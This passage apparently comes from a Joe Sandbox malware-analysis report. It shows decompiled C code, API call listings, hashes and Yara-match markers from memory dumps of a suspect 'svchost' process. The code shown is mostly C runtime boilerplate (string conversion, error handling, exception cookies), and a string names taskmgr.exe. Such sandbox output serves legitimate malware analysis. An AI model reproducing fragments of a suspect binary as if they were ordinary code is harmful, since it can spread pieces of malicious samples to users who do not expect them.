                                                				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                				_v12 = _t54;
                                                				if(_t54 == 0) {
                                                					L38:
                                                					_pop(_t104);
                                                					return E6FD5599E(_v8 ^ _t106, _t104);
                                                				} else {
                                                					_t95 = _t54 + _t54;
                                                					_t85 = _t95 + 8;
                                                					asm("sbb eax, eax");
                                                					if((_t95 + 0x00000008 & _t54) == 0) {
                                                						_t81 = 0;
                                                						__eflags = 0;
                                                						L14:
                                                						if(_t81 == 0) {
                                                							L36:
                                                							_t105 = 0;
                                                							L37:
                                                							E6FD5D2C6(_t81);
                                                							goto L38;
                                                						}
                                                						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                						_t121 = _t58;
                                                						if(_t58 == 0) {
                                                							goto L36;
                                                						}
                                                						_t100 = _v12;
                                                						_t60 = E6FD5A637(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                						_t105 = _t60;
                                                						if(_t105 == 0) {
                                                							goto L36;
                                                						}
                                                						if((_a12 & 0x00000400) == 0) {
                                                							_t96 = _t105 + _t105;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							__eflags = _t87 & _t60;
                                                							if((_t87 & _t60) == 0) {
                                                								_t101 = 0;
                                                								__eflags = 0;
                                                								L30:
                                                								__eflags = _t101;
                                                								if(__eflags == 0) {
                                                									L35:
                                                									E6FD5D2C6(_t101);
                                                									goto L36;
                                                								}
                                                								_t62 = E6FD5A637(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                								__eflags = _t62;
                                                								if(_t62 == 0) {
                                                									goto L35;
                                                								}
                                                								_push(0);
                                                								_push(0);
                                                								__eflags = _a28;
                                                								if(_a28 != 0) {
                                                									_push(_a28);
                                                									_push(_a24);
                                                								} else {
                                                									_push(0);
                                                									_push(0);
                                                								}
                                                								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                								__eflags = _t105;
                                                								if(_t105 != 0) {
                                                									E6FD5D2C6(_t101);
                                                									goto L37;
                                                								} else {
                                                									goto L35;
                                                								}
                                                							}
                                                							_t90 = _t96 + 8;
                                                							__eflags = _t96 - _t90;
                                                							asm("sbb eax, eax");
                                                							_t66 = _t60 & _t90;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t66 - 0x400;
                                                							if(_t66 > 0x400) {
                                                								__eflags = _t96 - _t87;
                                                								asm("sbb eax, eax");
                                                								_t101 = E6FD59FEE(_t87, _t66 & _t87);
                                                								_pop(_t87);
                                                								__eflags = _t101;
                                                								if(_t101 == 0) {
                                                									goto L35;
                                                								}
                                                								 *_t101 = 0xdddd;
                                                								L28:
                                                								_t101 =  &(_t101[4]);
                                                								goto L30;
                                                							}
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							E6FD5FCD0();
                                                							_t101 = _t107;
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								goto L35;
                                                							}
                                                							 *_t101 = 0xcccc;
                                                							goto L28;
                                                						}
                                                						_t70 = _a28;
                                                						if(_t70 == 0) {
                                                							goto L37;
                                                						}
                                                						_t125 = _t105 - _t70;
                                                						if(_t105 > _t70) {
                                                							goto L36;
                                                						}
                                                						_t71 = E6FD5A637(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                						_t105 = _t71;
                                                						if(_t71 != 0) {
                                                							goto L37;
                                                						}
                                                						goto L36;
                                                					}
                                                					asm("sbb eax, eax");
                                                					_t72 = _t54 & _t95 + 0x00000008;
                                                					_t85 = _t95 + 8;
                                                					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                						__eflags = _t95 - _t85;
                                                						asm("sbb eax, eax");
                                                						_t81 = E6FD59FEE(_t85, _t72 & _t85);
                                                						_pop(_t85);
                                                						__eflags = _t81;
                                                						if(__eflags == 0) {
                                                							goto L36;
                                                						}
                                                						 *_t81 = 0xdddd;
                                                						L12:
                                                						_t81 =  &(_t81[4]);
                                                						goto L14;
                                                					}
                                                					asm("sbb eax, eax");
                                                					E6FD5FCD0();
                                                					_t81 = _t107;
                                                					if(_t81 == 0) {
                                                						goto L36;
                                                					}
                                                					 *_t81 = 0xcccc;
                                                					goto L12;
                                                				}
                                                			}


                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,6FD5D2AF,?,?,00000000), ref: 6FD5D0B8
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6FD5D2AF,?,?,00000000,?,?,?), ref: 6FD5D13E
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,6FD5D2AF,?,?,00000000,?), ref: 6FD5D238
                                                • __freea.LIBCMT ref: 6FD5D245
                                                  • Part of subcall function 6FD59FEE: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6FD5DAC8,00000001,00000000,?,6FD5BCF0,00000001,00000004,00000000,00000001,?,?,6FD59BAA), ref: 6FD5A020
                                                • __freea.LIBCMT ref: 6FD5D24E
                                                • __freea.LIBCMT ref: 6FD5D273
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocHeap
                                                • String ID:
                                                • API String ID: 3147120248-0
                                                • Opcode ID: f5f73100e9912f53d4c0719b5b31767db8c7086f99b56c2c50ceca8c3dbb339e
                                                • Instruction ID: 5f8b9e7233712648e309d319dd646e38611fff1840f988ae4d499610a6a88799
                                                • Opcode Fuzzy Hash: f5f73100e9912f53d4c0719b5b31767db8c7086f99b56c2c50ceca8c3dbb339e
                                                • Instruction Fuzzy Hash: 7D51BE72604716ABEF558F64CC80EAB77AAEF86754F104629EC14DA180EB35FC61C670
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,039A0A68,039A0A68,?,?,?,039A8038,00000001,00000001,56E85006), ref: 039A7E41
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,039A8038,00000001,00000001,56E85006,?,?,?), ref: 039A7EC7
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,56E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 039A7FC1
                                                • __freea.LIBCMT ref: 039A7FCE
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                • __freea.LIBCMT ref: 039A7FD7
                                                • __freea.LIBCMT ref: 039A7FFC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: b8fa516072fe5103e92ae7aa0c716d1f49d9b82f5b413f43a665ccd06f67de66
                                                • Instruction ID: 95db162cb0a7e080e3a8a68c3f83cbbd067f6bfe10fdf8b349ce91bc695739b3
                                                • Opcode Fuzzy Hash: b8fa516072fe5103e92ae7aa0c716d1f49d9b82f5b413f43a665ccd06f67de66
                                                • Instruction Fuzzy Hash: EF51D472600616ABDF25CFE8CC42EBFB7A9EB80690B194769FC14DA140EB34DD50C6A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftoe
                                                • String ID:
                                                • API String ID: 4189289331-0
                                                • Opcode ID: e7ea6b83e55f996c052da18c126e7529230884ccf415145ba0366548f3257edf
                                                • Instruction ID: 2fe547ec4d432998bf1206145898447c8303e162b8698c379a1f9b4992df57f3
                                                • Opcode Fuzzy Hash: e7ea6b83e55f996c052da18c126e7529230884ccf415145ba0366548f3257edf
                                                • Instruction Fuzzy Hash: 7851FF7E904B05ABDB24DB9D8CC4EAFB7ADEF893B0F144319F8159A181DB31D50086E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E6FD55F15(void* __edx, void* __esi, void* __eflags) {
                                                				intOrPtr _t25;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				void* _t35;
                                                				intOrPtr _t36;
                                                				intOrPtr _t38;
                                                				void* _t39;
                                                
                                                				_t35 = __edx;
                                                				E6FD56580(0x6fd66800, 0xc);
                                                				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
                                                				_t36 =  *((intOrPtr*)(_t39 + 0xc));
                                                				if(_t36 == 1 || _t36 == 2) {
                                                					_t33 =  *((intOrPtr*)(_t39 + 8));
                                                					_t38 = E6FD5601E(_t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
                                                					 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
                                                					if(_t38 != 0) {
                                                						_t38 = E6FD55D33(_t34, _t35, _t36, _t38, _t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
                                                						 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
                                                						if(_t38 != 0) {
                                                							goto L5;
                                                						}
                                                					}
                                                				} else {
                                                					_t33 =  *((intOrPtr*)(_t39 + 8));
                                                					L5:
                                                					if(_t36 == 1) {
                                                						E6FD576D4(_t36, _t38, _t33);
                                                						_pop(_t34);
                                                					}
                                                					_push( *((intOrPtr*)(_t39 + 0x10)));
                                                					_push(_t36);
                                                					_push(_t33);
                                                					_t25 = E6FD55660();
                                                					_t38 = _t25;
                                                					 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
                                                					if(_t36 != 1) {
                                                						L12:
                                                						if(_t36 != 0) {
                                                							goto L14;
                                                						} else {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						if(_t38 == 0) {
                                                							_push( *((intOrPtr*)(_t39 + 0x10)));
                                                							_push(_t25);
                                                							_push(_t33);
                                                							E6FD55660();
                                                							E6FD55D33(_t34, _t35, _t36, _t38, _t33, _t38,  *((intOrPtr*)(_t39 + 0x10)));
                                                							E6FD5601E(_t33, _t38,  *((intOrPtr*)(_t39 + 0x10)));
                                                						}
                                                						if(_t36 != 1 || _t38 != 0) {
                                                							goto L12;
                                                						} else {
                                                							L13:
                                                							E6FD57770(_t36, _t38, _t33);
                                                							_pop(_t34);
                                                							if(_t36 == 0) {
                                                								L15:
                                                								_t38 = E6FD55D33(_t34, _t35, _t36, _t38, _t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
                                                								 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
                                                								if(_t38 != 0) {
                                                									_t38 = E6FD5601E(_t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
                                                									 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
                                                								}
                                                							} else {
                                                								L14:
                                                								if(_t36 == 3) {
                                                									goto L15;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				 *(_t39 - 4) = 0xfffffffe;
                                                				return E6FD565C6();
                                                			}











                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: dllmain_crt_dispatchdllmain_raw
                                                • String ID:
                                                • API String ID: 1382799047-0
                                                • Opcode ID: f22b9ff9f69318839f0f2d39f0803547a8917c67f586a2b74300033f31e2b651
                                                • Instruction ID: db31b32847f3fd97f38f04512986f906252182638ccfeb4a6d77c570ce360492
                                                • Opcode Fuzzy Hash: f22b9ff9f69318839f0f2d39f0803547a8917c67f586a2b74300033f31e2b651
                                                • Instruction Fuzzy Hash: AA217F72D05755EBCFA28F6C8D40A9F3A69AF46768B050609FC246B245CB35F9309BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03999934
                                                • int.LIBCPMT ref: 0399994B
                                                  • Part of subcall function 03992750: std::_Lockit::_Lockit.LIBCPMT ref: 03992761
                                                  • Part of subcall function 03992750: std::_Lockit::~_Lockit.LIBCPMT ref: 0399277B
                                                • codecvt.LIBCPMT ref: 0399996E
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0399998B
                                                • std::_Facet_Register.LIBCPMT ref: 039999AA
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 039999B3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrowcodecvt
                                                • String ID:
                                                • API String ID: 3298841034-0
                                                • Opcode ID: 48fa8e519eedfbacb21eb22b1dc0a01de4011c5b188affc5a073a8f6df6adbb4
                                                • Instruction ID: ddae724f40b9b85b0bdab6d89b472cfba8095a3d9f0d6898f03cfe850e501e90
                                                • Opcode Fuzzy Hash: 48fa8e519eedfbacb21eb22b1dc0a01de4011c5b188affc5a073a8f6df6adbb4
                                                • Instruction Fuzzy Hash: 88015B3A9013199BEF05EB68C9409BEB77DAFC4650F19084AD5617F290DF35AD0187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E6FD5B10A(void* __ebx, void* __ecx, void* __edx) {
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				void* _t3;
                                                				void* _t4;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t20;
                                                				void* _t21;
                                                				void* _t23;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t29;
                                                				void* _t31;
                                                				void* _t32;
                                                				long _t36;
                                                				long _t37;
                                                				void* _t40;
                                                
                                                				_t29 = __edx;
                                                				_t23 = __ecx;
                                                				_t20 = __ebx;
                                                				_t36 = GetLastError();
                                                				_t2 =  *0x6fd6952c; // 0x7
                                                				_t42 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t3 = E6FD5A03C(_t23, 1, 0x364);
                                                					_t31 = _t3;
                                                					_pop(_t25);
                                                					if(_t31 != 0) {
                                                						_t4 = E6FD5A57C(_t25, __eflags,  *0x6fd6952c, _t31);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E6FD5AF50(_t25, _t31, 0x6fd6b568);
                                                							E6FD59FB4(0);
                                                							_t40 = _t40 + 0xc;
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t31);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t3);
                                                						L4:
                                                						E6FD59FB4();
                                                						_pop(_t25);
                                                						L9:
                                                						SetLastError(_t36);
                                                						E6FD59F17(_t20, _t29, _t31, _t36);
                                                						asm("int3");
                                                						_push(_t20);
                                                						_push(_t36);
                                                						_push(_t31);
                                                						_t37 = GetLastError();
                                                						_t21 = 0;
                                                						_t9 =  *0x6fd6952c; // 0x7
                                                						_t45 = _t9 - 0xffffffff;
                                                						if(_t9 == 0xffffffff) {
                                                							L12:
                                                							_t32 = E6FD5A03C(_t25, 1, 0x364);
                                                							_pop(_t27);
                                                							if(_t32 != 0) {
                                                								_t11 = E6FD5A57C(_t27, __eflags,  *0x6fd6952c, _t32);
                                                								__eflags = _t11;
                                                								if(_t11 != 0) {
                                                									E6FD5AF50(_t27, _t32, 0x6fd6b568);
                                                									E6FD59FB4(_t21);
                                                									__eflags = _t32;
                                                									if(_t32 != 0) {
                                                										goto L19;
                                                									} else {
                                                										goto L18;
                                                									}
                                                								} else {
                                                									_push(_t32);
                                                									goto L14;
                                                								}
                                                							} else {
                                                								_push(_t21);
                                                								L14:
                                                								E6FD59FB4();
                                                								L18:
                                                								SetLastError(_t37);
                                                							}
                                                						} else {
                                                							_t32 = E6FD5A526(_t25, _t45, _t9);
                                                							if(_t32 != 0) {
                                                								L19:
                                                								SetLastError(_t37);
                                                								_t21 = _t32;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						}
                                                						return _t21;
                                                					}
                                                				} else {
                                                					_t31 = E6FD5A526(_t23, _t42, _t2);
                                                					if(_t31 != 0) {
                                                						L8:
                                                						SetLastError(_t36);
                                                						return _t31;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                			}






















                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,6FD58E31,00000000,?,?,6FD59013,00000104,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost), ref: 6FD5B10E
                                                • _free.LIBCMT ref: 6FD5B141
                                                • _free.LIBCMT ref: 6FD5B169
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B176
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B182
                                                • _abort.LIBCMT ref: 6FD5B188
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 98bcdb0fc2f41aff90efe429d816ee3ef42968ef2859a63ffdd9b56df385767b
                                                • Instruction ID: 8215cae72bdbe9d3cf710bcc9089ea02bacdc8869038756dc2140c6d690cba4b
                                                • Opcode Fuzzy Hash: 98bcdb0fc2f41aff90efe429d816ee3ef42968ef2859a63ffdd9b56df385767b
                                                • Instruction Fuzzy Hash: 65F06D77548B10A6DFC253345904E5A2629DF87779F240215F614962C5EF20F4365571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                • _free.LIBCMT ref: 039A5F19
                                                • _free.LIBCMT ref: 039A5F41
                                                • SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                • _abort.LIBCMT ref: 039A5F60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: aa5fd8d0af262c8777b01eec6520f4fb13e9cd57beafb5f3e7894b6081b36852
                                                • Instruction ID: 442a11672497b869994aea6f3830fd93569adb874814a5a3feaa6edfc6ccb9b2
                                                • Opcode Fuzzy Hash: aa5fd8d0af262c8777b01eec6520f4fb13e9cd57beafb5f3e7894b6081b36852
                                                • Instruction Fuzzy Hash: C0F0817A74CF0067D611F26E6D08B2B266D9BC25A1B1B0314F595EE286FE70C80195E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 03991C1F
                                                  • Part of subcall function 03998FB3: __CxxThrowException@8.LIBVCRUNTIME ref: 03998FCA
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 03991C32
                                                • new.LIBCMT ref: 03991C38
                                                • new.LIBCMT ref: 03991C55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                • String ID: 2\taskmgr.exe
                                                • API String ID: 3339364867-3441168942
                                                • Opcode ID: 46cd34651673b88bdc35c1c173cc30a65f05f3142bb5f92eb62cdf836264acb8
                                                • Instruction ID: 56c08db777a10d2661d97c4613ab1c6523faef47fa7d3b2356c8e23a96dad468
                                                • Opcode Fuzzy Hash: 46cd34651673b88bdc35c1c173cc30a65f05f3142bb5f92eb62cdf836264acb8
                                                • Instruction Fuzzy Hash: 4541D474A007069FEF24DF6CC58266AFBE9FB45250F540A2FE856CB380E7709944C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E6FD57540(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				long _v32;
                                                				WCHAR* _v36;
                                                				struct HINSTANCE__* _v40;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t54;
                                                				long _t56;
                                                				signed int _t62;
                                                				intOrPtr _t63;
                                                				void* _t64;
                                                				intOrPtr _t67;
                                                				long _t69;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int _t76;
                                                				char _t78;
                                                				void* _t90;
                                                				intOrPtr _t91;
                                                				WCHAR* _t93;
                                                				intOrPtr _t96;
                                                				long _t98;
                                                				intOrPtr* _t100;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t110;
                                                
                                                				_t72 = _a8;
                                                				_push(_t90);
                                                				_v5 = 0;
                                                				_t96 = _t72 + 0x10;
                                                				_push(_t96);
                                                				_v16 = 1;
                                                				_v20 = _t96;
                                                				_v12 =  *(_t72 + 8) ^  *0x6fd68008;
                                                				_t54 = E6FD57500(_t90, _t96,  *(_t72 + 8) ^  *0x6fd68008);
                                                				_t91 = _a12;
                                                				_push(_t91);
                                                				E6FD5670E(_t54);
                                                				_t56 = _a4;
                                                				_t104 = _t103 + 0xc;
                                                				if(( *(_t56 + 4) & 0x00000066) != 0) {
                                                					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
                                                					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
                                                						E6FD58B67(_t72, 0xfffffffe, _t96, 0x6fd68008);
                                                						goto L18;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					_v32 = _t56;
                                                					_v28 = _t91;
                                                					_t91 =  *((intOrPtr*)(_t72 + 0xc));
                                                					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
                                                					if(_t91 == 0xfffffffe) {
                                                						L19:
                                                						return _v16;
                                                					} else {
                                                						do {
                                                							_t76 = _v12;
                                                							_t19 = _t91 + 2; // 0x3
                                                							_t62 = _t91 + _t19 * 2;
                                                							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
                                                							_t63 = _t76 + _t62 * 4;
                                                							_t77 =  *((intOrPtr*)(_t63 + 4));
                                                							_v24 = _t63;
                                                							if( *((intOrPtr*)(_t63 + 4)) == 0) {
                                                								_t78 = _v5;
                                                								goto L12;
                                                							} else {
                                                								_t64 = E6FD58B1E(_t77, _t96);
                                                								_t78 = 1;
                                                								_v5 = 1;
                                                								_t110 = _t64;
                                                								if(_t110 < 0) {
                                                									_v16 = 0;
                                                									L18:
                                                									_push(_t96);
                                                									E6FD57500(_t91, _t96, _v12);
                                                									goto L19;
                                                								} else {
                                                									if(_t110 <= 0) {
                                                										goto L12;
                                                									} else {
                                                										_t65 = _a4;
                                                										if( *_a4 == 0xe06d7363) {
                                                											_t112 =  *0x6fd614ac;
                                                											if( *0x6fd614ac != 0) {
                                                												_t65 = E6FD5F960(_t112, 0x6fd614ac);
                                                												_t104 = _t104 + 4;
                                                												if(_t65 != 0) {
                                                													_t100 =  *0x6fd614ac; // 0x6fd5670f
                                                													L6FD56575();
                                                													_t65 =  *_t100(_a4, 1);
                                                													_t96 = _v20;
                                                													_t104 = _t104 + 8;
                                                												}
                                                											}
                                                										}
                                                										E6FD58B4E(_t65, _a8, _a4);
                                                										_t67 = _a8;
                                                										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
                                                											E6FD58B67(_t67, _t91, _t96, 0x6fd68008);
                                                											_t67 = _a8;
                                                										}
                                                										_push(_t96);
                                                										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
                                                										E6FD57500(_t91, _t96, _v12);
                                                										E6FD58B35();
                                                										asm("int3");
                                                										_push(_t96);
                                                										_t98 = _v32;
                                                										_push(_t91);
                                                										_t93 = _v36;
                                                										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
                                                										if(_t98 != 0) {
                                                											if(_t69 == 0) {
                                                												 *_t93 = 0;
                                                											}
                                                											if(_t69 == _t98) {
                                                												_t69 = GetLastError();
                                                												if(_t69 == 0) {
                                                													 *(_t93 + _t98 * 2 - 2) = _t69;
                                                												}
                                                											}
                                                										}
                                                										return _t69;
                                                									}
                                                								}
                                                							}
                                                							goto L29;
                                                							L12:
                                                							_t91 = _t74;
                                                							__eflags = _t74 - 0xfffffffe;
                                                						} while (_t74 != 0xfffffffe);
                                                						__eflags = _t78;
                                                						if(_t78 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                				L29:
                                                			}


                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6FD5756B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6FD575E5
                                                  • Part of subcall function 6FD5F960: __FindPESection.LIBCMT ref: 6FD5F9B9
                                                • _ValidateLocalCookies.LIBCMT ref: 6FD57659
                                                • _ValidateLocalCookies.LIBCMT ref: 6FD57684
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: 751d27cd8949fa1803e689dd79bcd68a2d549dd4607daa670a4d82afd4568c60
                                                • Instruction ID: 05d63399212fc0dfc2401b1b40dd2ea9a3f0bc0733a5649ac51a529a7f6bb5a2
                                                • Opcode Fuzzy Hash: 751d27cd8949fa1803e689dd79bcd68a2d549dd4607daa670a4d82afd4568c60
                                                • Instruction Fuzzy Hash: C8416034D04309EBCF81CF69C880A9EBBB5AF45329F24C156D8295B395D731FA25CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E6FD547E0() {
                                                				void* _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr _t13;
                                                				void* _t14;
                                                				void* _t15;
                                                				intOrPtr _t20;
                                                				intOrPtr _t21;
                                                				intOrPtr _t22;
                                                				intOrPtr _t23;
                                                				signed int _t24;
                                                				signed int _t25;
                                                				void* _t26;
                                                
